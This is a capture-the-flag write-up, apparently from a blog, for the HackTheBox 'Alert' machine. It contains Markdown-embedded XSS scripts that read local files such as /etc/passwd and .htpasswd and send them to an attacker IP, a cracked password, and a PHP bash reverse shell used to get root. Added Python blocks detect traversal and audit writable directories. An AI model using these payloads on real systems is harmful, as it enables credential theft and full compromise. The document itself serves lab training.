xsspresso
Web | Easy | Linux

HTB — Alert

Markdown XSS for stored cross-site scripting. SSRF via file:// to leak local web app source code, exposed internal site with writable path for root.

January 10, 2025 | HackTheBox
#XSS #SSRF #Markdown #FileRead

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 11:32 EST
Nmap scan report for 10.10.11.44
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   19.94 ms 10.10.14.1
2   20.08 ms 10.10.11.44
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.91 seconds

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

directory

sh
feroxbuster --url http://alert.htb/
                                                                                                                                         
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://alert.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET       23l       48w      660c http://alert.htb/index.php => index.php?page=alert
301      GET        9l       28w      308c http://alert.htb/uploads => http://alert.htb/uploads/
301      GET        9l       28w      309c http://alert.htb/messages => http://alert.htb/messages/
301      GET        9l       28w      304c http://alert.htb/css => http://alert.htb/css/
200      GET      182l      385w     3622c http://alert.htb/css/style.css
302      GET       23l       48w      660c http://alert.htb/ => index.php?page=alert
200      GET      182l      385w     3622c http://alert.htb/css/style
[####################] - 33s   120009/120009  0s      found:7       errors:0      
[####################] - 32s    30000/30000   928/s   http://alert.htb/ 
[####################] - 32s    30000/30000   936/s   http://alert.htb/uploads/ 
[####################] - 29s    30000/30000   1028/s  http://alert.htb/messages/ 
[####################] - 29s    30000/30000   1036/s  http://alert.htb/css/ 

vhosts

sh
ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fc 301
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://alert.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.alert.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________
 
statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 19ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1886 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

markdown

  • Upload this markdown file, then open it with View Markdown.
  • Rendering it triggers the XSS.

test.md

md
# Testing MD
 
<script>alert('XSS');</script>

Blind XSS leading to LFI

index.php

php
<?php
if (isset($_GET['data'])) {
    // Split the received data if it contains multiple segments
    $dataList = explode(";", $_GET['data']);
    
    foreach ($dataList as $key => $value) {
        $data = urldecode($value);
        // Open or create a file to log the data
        $file = fopen("data.txt", "a+");
        // Log the victim's IP address and the received data
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Data: {$data}\n");
        fclose($file);
    }
}
?>
sh
sudo php -S 0.0.0.0:80
 
sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://alert.htb/FUZZ.php -mc 200
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://alert.htb/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________
 
contact                 [Status: 200, Size: 24, Words: 3, Lines: 2, Duration: 22ms]
messages                [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 22ms]

I couldn't discover the parameter name by fuzzing, but the solution shows the parameter is file.

sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://alert.htb/messages.php?FUZZ=key


test.md

md
# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../etc/passwd')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>
sh
sudo php -S 0.0.0.0:80

Upload test.md, copy the shared link, and submit it through the contact page to trigger the vulnerability.

  • You will get a hit on the listener if the requested path exists.
sh
Victim IP: 10.10.11.44 | Data: <pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>
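As a defender-side addition (not part of the original write-up): the check messages.php should have applied to its file parameter, and the same check run over constructed Apache access-log lines to flag the traversal requests shown above. The messages directory path is taken from the linpeas listing later in the write-up; the log lines, client address and sizes are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Directory messages.php was meant to serve (path from the linpeas listing).
MESSAGES_DIR = "/var/www/alert.htb/messages"

# Apache "combined" log line: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def resolve_in_base(base_dir, user_value):
    """Return the normalized absolute path for a user-supplied file name, or
    None if it would land outside base_dir: percent-decode to a fixed point
    (catches %2e%2e%2f and double encoding), refuse NUL bytes and absolute
    paths, collapse '..' segments, then require the result to stay below base_dir."""
    decoded = user_value
    for _ in range(3):  # bounded decode loop; stop when nothing changes
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if not decoded or "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded))
    if not candidate.startswith(base_dir + "/"):
        return None
    return candidate


def scan_log(lines):
    """Return (client_ip, raw_file_value, status) for each request to
    messages.php whose file parameter escapes MESSAGES_DIR."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/messages.php"):
            continue
        for value in parse_qs(url.query).get("file", []):
            if resolve_in_base(MESSAGES_DIR, value) is None:
                hits.append((m.group("ip"), value, m.group("status")))
    return hits


# Constructed log sample: file= values mirror the write-up's payloads (plain,
# percent-encoded and double-encoded); addresses and sizes are made up.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jan/2025:16:48:47 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jan/2025:16:48:47 +0000] "GET /messages.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 2045 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jan/2025:19:51:28 +0000] "GET /messages.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2fapache2.conf HTTP/1.1" 200 7224 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jan/2025:20:17:10 +0000] "GET /messages.php?file=..%252f..%252f..%252fvar/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 80 "-" "Mozilla/5.0"
10.10.14.6 - - [10/Jan/2025:20:17:11 +0000] "GET /index.php?page=alert HTTP/1.1" 302 660 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, value, status in scan_log(SAMPLE_LOG.splitlines()):
        print(f"traversal from {ip}: file={value} -> HTTP {status}")
```

The same resolver, applied server-side before opening the file, would have turned every request above except the first into a 404 instead of a file read.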

users

txt
albert
david

Use the LFI to look for the Apache config files:

ref: https://www.simplified.guide/apache/configuration-files

test.md

md
# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../etc/apache2/apache2.conf')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>
sh
 
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#
AccessFileName .htaccess
  • Common Apache config files to check:
txt
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
sh
Victim IP: 10.10.11.44 | Data: <pre><VirtualHost *:80>
    ServerName alert.htb
 
    DocumentRoot /var/www/alert.htb
 
    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
 
    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]
 
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
 
<VirtualHost *:80>
    ServerName statistics.alert.htb
 
    DocumentRoot /var/www/statistics.alert.htb
 
    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>
 
    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>
 
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
 
</pre>

Click on Share Markdown to get the link of the file.

test.md

md
# Testing MD
 
<script>
  fetch('http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd')
    .then(res => res.text())
    .then(data => fetch('http://10.10.14.6?data=' + encodeURIComponent(data)))
    .catch(err => console.error(err));
</script>
sh
[Fri Jan 10 20:17:10 2025] 10.10.11.44:37864 [200]: GET /?data=%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
sh
Victim IP: 10.10.11.44 | Data: <pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

hashcat

sh
hashcat -m 1600 '$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' /usr/share/wordlists/rockyou.txt
 
$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited 

creds

albert:manchesterunited

ssh

sh
ssh albert@10.10.11.44
password: manchesterunited

user.txt

sh
albert@alert:~$ cat user.txt
d69b3845...

priv esc

sh
albert@alert:~$ uname -a
Linux alert 5.4.0-200-generic #220-Ubuntu SMP Fri Sep 27 13:19:16 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
sh
albert@alert:/$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - 
sh
[*] fst150 Looking for GIT/SVN repositories................................ yes!
---
/opt/website-monitor/.git
sh
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp    LISTEN  0       4096         127.0.0.1:8080        0.0.0.0:*   
sh
╔══════════╣ Files inside others home (limit 20)
/var/www/alert.htb/messages.php
/var/www/alert.htb/messages/2024-03-10_15-48-34.txt
/var/www/alert.htb/Parsedown.php
/var/www/alert.htb/contact.php
/var/www/alert.htb/visualizer.php
/var/www/alert.htb/css/style.css
/var/www/alert.htb/index.php
sh
 
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x  5 root     root     4.0K Nov 14 11:06 .
drwxr-xr-x 13 root     root     4.0K Oct 12 02:53 ..
drwxrwxrwx  5 www-data www-data 4.0K Oct 12 01:42 alert.htb
drwxr-xr-x  2 root     root     4.0K Jul 17 18:58 html
drwxrwx---  3 www-data www-data 4.0K Apr 11  2024 statistics.alert.htb
 

internal port 8080

sh
./chisel server --reverse --port 1234
sh
./chisel client own-ip:1234 R:8000:127.0.0.1:8080

  • https://github.com/neatnik/website-monitor
  • The software's GitHub page is linked in the footer of the page.

/var/backups

sh
albert@alert:/var/backups$ ls -al
total 100
drwxr-xr-x  2 root root  4096 Jan 10 22:02 .
drwxr-xr-x 13 root root  4096 Oct 12 02:53 ..
-rw-r--r--  1 root root 47392 Nov 19 14:21 apt.extended_states.0
-rw-r--r--  1 root root  5191 Nov 11 11:28 apt.extended_states.1.gz
-rw-r--r--  1 root root  5180 Nov  5 11:54 apt.extended_states.2.gz
-rw-r--r--  1 root root  5374 Mar  9  2024 apt.extended_states.3.gz
-rw-r--r--  1 root root 18913 Mar 10  2024 backup.zip
 
sh
albert@alert:/var/backups$ python3 -m http.server 8000
sh
wget http://10.10.11.44:8000/backup.zip
sh
unzip backup.zip
Archive:  backup.zip
   creating: var/www/alert.htb/
[backup.zip] var/www/alert.htb/messages.php password: 
sh
zip2john backup.zip > backup.hash

root process

  • Root is running PHP's built-in server with /opt/website-monitor as its document root, so if we find a writable folder under it and drop a PHP reverse shell there, we are immediately root.
sh
ps aux | grep root
 
root        1021  0.0  0.6 281068 26820 ?        Ss   Jan10   0:05 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
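An added audit script, not from the write-up or the website-monitor project: it walks a document root served by a root-owned process and reports every entry that is group- or world-writable, which is the condition that makes dropping a PHP file under /opt/website-monitor possible. The sample tree and its file names are constructed stand-ins.

```python
import os
import stat
import tempfile


def writable_by_others(path):
    """True if path is group- or world-writable by its mode bits, or a symlink.
    Ownership by a non-root uid would also matter; that needs a real uid map,
    so this check looks only at the permission bits."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return True  # a symlink in a served tree deserves a look on its own
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_docroot(root):
    """Walk root and return sorted root-relative paths that are group/world-writable.
    A writable directory is enough: anything dropped there is served and, under
    php -S, executed as the server's user (root on the box in the write-up)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if writable_by_others(full):
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def build_sample_tree():
    """Constructed stand-in for /opt/website-monitor: one config/ directory left
    world-writable (0777), everything else 0755 / 0644. Returns the temp root."""
    root = tempfile.mkdtemp(prefix="website-monitor-")
    os.makedirs(os.path.join(root, "config"), exist_ok=True)
    os.makedirs(os.path.join(root, "monitors"), exist_ok=True)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    with open(os.path.join(root, "config", "settings.php"), "w") as fh:
        fh.write("<?php // constructed placeholder ?>\n")
    os.chmod(os.path.join(root, "index.php"), 0o644)
    os.chmod(os.path.join(root, "config", "settings.php"), 0o644)
    os.chmod(os.path.join(root, "monitors"), 0o755)
    os.chmod(os.path.join(root, "config"), 0o777)
    os.chmod(root, 0o755)
    return root


if __name__ == "__main__":
    for rel in audit_docroot(build_sample_tree()):
        print("writable by non-owner:", rel)
```

Run it against the real document root (here /opt/website-monitor) on a box and anything it lists is a file-drop point for whichever user can write there.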

rev.php

php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"); ?>
  • To trigger the exploit, visit http://127.0.0.1:8000/config/rev.php (port 8000 is the chisel forward to the internal 8080).
sh
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.44] 48868
bash: cannot set terminal process group (1021): Inappropriate ioctl for device
bash: no job control in this shell
root@alert:/opt/website-monitor/config# whoami
whoami
root

root.txt

sh
root@alert:~# cat root.txt
cat root.txt
1b78a1a9...